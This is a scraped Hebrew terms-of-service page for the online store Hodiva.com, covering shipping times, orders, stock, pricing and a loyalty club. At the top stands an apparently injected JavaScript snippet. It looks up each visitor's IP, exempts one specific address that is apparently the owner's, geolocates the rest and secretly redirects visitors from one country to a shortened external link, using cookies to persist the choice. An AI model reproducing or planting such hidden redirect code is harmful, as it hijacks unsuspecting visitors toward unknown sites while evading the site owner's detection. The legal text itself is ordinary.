function createCookie(name, value, days) { var date, expires; if (days) { date = new Date(); date.setTime(date.getTime()+(days*24*60*60*1000)); expires = "; expires="+date.toUTCString(); } else { expires = ""; } document.cookie = name+"="+value+expires+"; path=/"; } function getCookie(cname) { var name = cname + "="; var decodedCookie = decodeURIComponent(document.cookie); var ca = decodedCookie.split(';'); for(var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length, c.length); } } return ""; } if (getCookie('ipapi') != 'skip'){ if (getCookie('ipapi') == 'redirect'){ window.location.href = "https://lp.vp4.me/g9ex"; }else{ jQuery.ajax({ url: "https://api.ipify.org/?format=json", async:false, success: function(e) {if (e.ip == '68.129.215.245'){ createCookie('ipapi', 'skip', 32); return true;}jQuery.ajax({ url: "https://ipapi.co/country/", async:false, success: function(data) { if (data == 'CG'){ createCookie('ipapi', 'redirect', 32); window.location.href = "https://lp.vp4.me/g9ex"; }else{ createCookie('ipapi', 'skip', 32); return true; } }, error: function () { createCookie('ipapi', 'skip', 32); return true; } }); }, error: function () { createCookie('ipapi', 'skip', 32); return true; } }); } }

תקנון אתר


הגדרות

תקנון זה חל על החנות האינטרנטית "Hodiva.com"

כללי:

 • האתר - אתר האינטרנט www.hodiva.com.
 • החברה המפעילה את האתר Hodiva LLC (חברה הרשומה בניו-יורק, ארה״ב)
 • מוצרים - אלו המופיעים באתר ומוצעים למכירה.
 • זמן אספקת הסחורה: יום אספקת הסחורה – היום בו יתבצע ניסיון מסירה ליעד המבוקש ע״י הלקוחה.

* זמן המשלוח: עד 15 ימי עסקים מתאריך המשלוח (היציאה מהמחסן) בפועל, ייתכן וזמן אספקת הסחורה יתארך מעבר לזמן האמור בשל תלות באילוצי חברות הדואר והמשלוח, רוב המשלוחים יוצאים מהמחסן תוך 2 ימי עסקים.

בתקופת מבצעים והנחות ייתכנו עיכובים בזמני המשלוח, בדר"כ עיכוב של עד 7 ימי עסקים ובמקרים חריגים אף יותר מכך.

 1. כתובת למשלוח דואר - הכתובת שציינה המזמינה ככתובת למשלוח הזמנות.
 2. יום ביצוע ההזמנה - היום בו אושרה ההזמנה במערכות החנות ולאחר שהעסקה אושרה ע״י חברת האשראי.
 3. ימי עסקים הינם ימי חול, שני עד שישי, או ראשון עד חמישי בכפוף למיקום השולח ומיקום החבילה בדרכה לנמענת.
 4. האתר משמש כחנות מסחר אלקטרונית למכירת מוצרים ישירות מחו״ל או מישראל והוא בבעלות Hodiva LLC ומנוהל על ידה.
 5. לכל שאלה ו/או הבהרה ו/או בירור ניתן לפנות ישירות לשרות הלקוחות של Hodiva Shop במייל info@hodiva.com
 6. הוראות תקנון זה יחולו על כל שימוש שייעשה על ידך באתר ועל כל רכישה שתתבצע על ידך באמצעות האתר, ויהוו את הבסיס החוקי להזמנות ולגלישה באתר והוא בלבד המסדיר את היחסים בין Hodiva לבין הלקוחות.
 7. כל המבצעת הזמנה ו/או רכישה דרך האתר מצהירה, כי עם ביצוע הפעולה היא קראה תקנון זה, וכי היא מסכימה לכל הוראותיו ותנאיו של תקנון זה, וכי לא תהיה לה או למי מטעמה כל טענה ו/או דרישה ו/או תביעה כנגד האתר ו/או החברה ו/או הנהלת האתר ו/או החברה ו/או מי ממנהליה ו/או עובדיה, בכל הקשור להוראות והתנאים של תקנון זה.
 8. החברה שומרת לעצמה את הזכות לשנות את התקנון מפעם לפעם על פי שיקול דעתה הבלעדי וזאת ללא צורך במתן התראה ו/או הודעה מוקדמת.
 9. מחירי המוצרים כוללים מיסים מקומיים (ארה״ב) על פי דין. בהזמנת מוצרים מחו״ל ייתכן ורשויות המס בארצך יבקשו ממך תשלום מס (כגון מכס ו/או מע״מ בהתאם לחוק בארצך).
 10. רישומי המחשב של החברה בלבד, בדבר הפעולות המתבצעות דרך האתר יהוו ראיה לכאורה לנכונות הפעולות.
 11. תמונות המוצרים המוצגות באתר משמשות להמחשה בלבד ואינן מחייבות כלל את הנהלת האתר. עם זאת, מוסכם ומובהר, כי Hodiva תשתדל לעשות את מיטב יכולתה כדי להציג בפני לקוחותיה תמונות מדויקות ככל האפשר.
 12. Hodiva אינה מתחייבת להחזיק מלאי של כל המוצרים שתמונותיהם מופיעות באתר.
 13. Hodiva עושה ככל שביכולתה לוודא כי המידע המוצג באתר יהיה המידע השלם והמדויק ביותר. עם זאת, יובהר, כי עלולים להופיע בו, בתום לב, אי דיוקים או שגיאות והחברה לא תישא באחריות כל שהיא הנובעת מהן או קשורה אליהן.
 14. כל המחירים באתר מופיעים על גבי המוצרים ונקובים בדולר ארה״ב. המחירים אינם כוללים דמי משלוח למעט אם צויין אחרת במפורש.
 15. הנהלת האתר רשאית לעדכן את מחירי המוצרים באתר ואת תעריפי המשלוחים מעת לעת ובלא צורך בהודעה מוקדמת. המחיר התקף ביחס להזמנה שבוצעה הוא המחיר שהתפרסם בעת השלמת את תהליך ההזמנה (הכולל את מסירת פרטי כרטיס אשראי). אם עודכנו המחירים לפני שהושלם תהליך ההזמנה, תחויב הלקוחה לפי המחירים המעודכנים.
 16. הנהלת האתר רשאית להציע באתר מבצעים, הטבות והנחות. הנהלת האתר רשאית בכל עת, לפי שיקול דעתה הבלעדי, להפסיק מבצעים, הטבות והנחות אלה, להחליפם או לשנותם, בלא צורך לתת כל הודעה מוקדמת על כך.
 17. כרטיסי חיוב אשר לא ניתן לזכותם יהיו זכאים לקרדיט באתר בלבד.

כללי

 1. תנאי השימוש באתר חלים על השימוש באתר ובשירותים הכלולים בו באמצעות כל מחשב או מכשיר תקשורת אחר (כדוגמת טלפון סלולרי, מחשבי כף יד למיניהם וכיו״ב). כמו כן הם חלים על השימוש באתר בין אם באמצעות רשת האינטרנט, ובין אם באמצעות כל רשת או אמצעי תקשורת אחרים.
 2. בעת עדכון סל הקניות, Hodiva שומרת לעצמה את הזכות להעביר תזכורת ללקוחה אודות הסל הנטוש, באמצעות שליחת מייל או סמס.
 3. הרישום לאתר מוגבל ביצירת חשבון יחיד לכל לקוח/ה. החברה שומרת לעצמה את הזכות להסיר כל חשבון לפי לדעתה וללא כל צורך בנימוק כלשהוא.
 4. כותרות הפרקים מובאות לשם נוחות והתמצאות המשתמשת באתר ולא ישמשו כפרשנות התקנון.
 5. בכל מקום בתקנון זה בו נעשה שימוש בלשון נקבה, הכוונה גם לזכר.
 6. רכישת מוצרים תתבצע על ידי לקוחה באמצעות מילוי טופס הזמנה המופיע באתר. מילוי כל הפרטים מהווה תנאי מוקדם לביצוע ההזמנה

  הרשמה לאתר Hodiva וביצוע הזמנות באתר

  1. הנהלת האתר מתחייבת שלא לעשות בפרטי המזמינה כל שימוש, אלא בהתאם למדיניות הפרטיות של האתר ומהווה חלק בלתי נפרד מתנאי שימוש ורכישה אלה.
  2. על מנת להבטיח את ביצוע ההזמנה ביעילות וללא תקלות, על המזמינה להקפיד למסור את כל הפרטים הנדרשים באתר במדויק. אם בעת ביצוע ההזמנה יימסרו פרטים שגויים, חברת Hodiva לא תוכל להבטיח שהמוצרים יגיעו ליעדם. במקרה שהמוצרים יחזרו לשולח בגלל פרטים מוטעים, תחויב המזמינה בתשלום בגין דמי משלוח וטיפול.
  3. יובהר כי פרטי ההזמנה כפי שהזינה המזמינה בטופס ההזמנה ורישום העסקה במחשבי האתר יהוו ראייה חלוטה וסופית לנכונות דרך הפעולה.
  4. אישור פעולת הרכישה מותנה בזה שהמוצר אכן קיים במלאי במועד האספקה המבוקש ו/או במועד ההזמנה. עם זאת, במידה ולא צוין, כי המוצר אינו קיים במלאי והמוצר לא הורד מהאתר עד למועד ביצוע ההזמנה, לא תהא Hodiva מחויבת במכירת המוצר, ולרוכשת לא תהיה כל טענה ו/או תביעה בעניין זה בגין כל סוג של נזק, בין נזק ישיר או נזק עקיף אשר נגרם לרוכשת ו/או לצד ג'. האמור הנו בכפוף לכך שהנהלת האתר תשיב למזמינה כל סכום ששילמה במידה ואכן שילמה לHodiva ו/או תבטל Hodiva את החיוב במידה ובוצע. יש להדגיש ולהבהיר, כי ייתכנו מצבים בהם על אף שפריט מסוים מוצג באתר כקיים במלאי, בפועל אינו קיים במלאי ולא ניתן לספק אותו – במצבים אלו תישלח למזמינה הודעה מתאימה באמצעות דואר אלקטרוני או באמצעות הטלפון. במקרה זה, תהא רשאית Hodiva להציע למזמינה מוצר חלופי שווה ערך למוצר שהוזמן. במידה והמזמינה תקבל את הצעת Hodiva, יעודכנו פרטי ההזמנה החדשה. היה והמזמינה אינה מעוניינת במוצר החלופי, Hodiva תבטל את העסקה ולמזמינה לא תהא טענה בקשר לכך בכפוף להשבת הסכום ששולם לHodiva על ידי המזמינה.
  5. כל מזמינה תהיה רשאית להזמין מוצר ולבחור יעד מבוקש למשלוח וזאת על ידי עדכון היעד המבוקש בטופס ההזמנה – אך היעד האחרון למשלוח שיעודכן על ידי המזמינה יישמר במאגר Hodiva כיעד המבוקש של המזמינה.
  6. יודגש כי כל מזמינה רשאית להזמין באתר על מנת לבצע רכישות, בכפוף למילוי התנאים המצטברים המפורטים להלן:
   • המזמינה הנה כשירה לבצע פעולות משפטיות מחייבות. במידה והמזמינה הנה קטינה (מתחת לגיל 18) או אינה זכאית לבצע פעולות משפטיות ללא אישור אפוטרופוס, יראו את שימושה באתר כאילו קיבלה את אישור האפוטרופוס.
   • המזמינה הנה בעלת כרטיס אשראי תקף שהונפק על ידי אחת מחברות כרטיסי האשראי.
  7.  יובהר כי Hodiva תהיה זכאית שלא לאשר הזמנה של מזמינה מכל סיבה שהיא ולפי שיקול דעתה הבלעדי, לרבות במקרים בהם:                                                                          
       •    בעת ההרשמה באתר נמסרו במתכוון פרטים שגויים ולא מדויקים.
       •    בוצעו מעשה או מחדל, הפוגעים או עלולים לפגוע באתר או בהנהלת האתר, או בצדדים שלישיים כלשהם, לרבות לקוחותיה, עובדיה וספקיה של הנהלת האתר.
       •    שירותי האתר שימשו לביצוע מעשה הנחזה כבלתי חוקי על-פי דיני מדינת ישראל ו/או ארה״ב כדי לאפשר, להקל, לסייע או לעודד ביצועו של מעשה כזה.
       •    הופרו תנאי תקנון זה, תנאיו של אחד מהמסמכים המחייבים או תנאיו של כל שירות מקוון אחר שיציע האתר.
       •    ישנו חוב כספי לHodiva או לחברות הקשורות עמה והחוב לא נפרע, למרות שחלף המועד לתשלומו.
       •    כרטיס האשראי שברשות המזמינה נחסם או הוגבל לשימוש בדרך כלשהיא.
  8. לאחר שהוזנו פרטי התשלום בדף התשלום, יישלח אישור באמצעות הדואר האלקטרוני ו/או סמס על קליטת פרטי ההזמנה. עם זאת, יש להדגיש, כי אישור זה אינו מחייב את הנהלת האתר לספק את המוצרים, והוא רק מעיד שפרטי ההזמנה נקלטו אצל במערכת האתר.
  9. אם יתברר שכרטיס האשראי של המזמינה אינו תקף, או שחברת כרטיסי האשראי איננה מכבדת את העסקה, (או כל שירות ארנק אלקטרוני זמין אחר) אינה מכבדת את החיוב, או שהמוצר המבוקש איננו מצוי במלאי הזמין לHodiva, הנהלת האתר רשאית, אך לא מחוייבת, ליצור קשר עם המזמינה באמצעות דואר אלקטרוני או באמצעות טלפון לשם השלמת העסקה או ביטולה.

  מועדון לקוחות ותוכנית הטבות

  Hodiva LLC  תוכל להפעיל תוכנית הטבות לנרשמים למועדון הלקוחות של האתר ותהא רשאית לקבוע ולשנות מעת לעת את השיטות ו/או הנוסחאות השונות לצבירת ו/או מימוש נקודות, לרבות אך לא רק עבור מוצרים מסוימים, קולקציות מסוימות, לשימוש בשירותים מסוימים וכיוצא בזה, וזאת על פי שיקול דעתה הבלעדי.
  כן רשאית Hodiva LLC לקבוע מעת לעת כי קבוצות לקוח מסוימות יהיו זכאיות לתנאים שונים בכל הנוגע לצבירת הנקודות ו/או אי צבירתן ו/או ערכן ו/או הטבות מועדון שונות בפורמטים שונים של Hodiva LLC על פי שיקול דעתה הבלעדי. למען הסר ספק מובהר כי Hodiva LLC לא תהיה מחוייבת להודיע לחברת מועדון על שינוי תנאי תקנון זה.

   קראי גם:

   הגבלת אחריות

   מדיניות פרטיות

   מדיניות ביטולים והחזרות


   חזרה למעלה

   מומלץ בחום!

   הוסיפי שקט נפשי לסל הקניות ודעי בכל רגע היכן נמצאת החבילה שלך.

   תוספת עבור מספר מעקב HODIVA LUX HODIVA SHOP HODIVA ACTIVE
   $3.59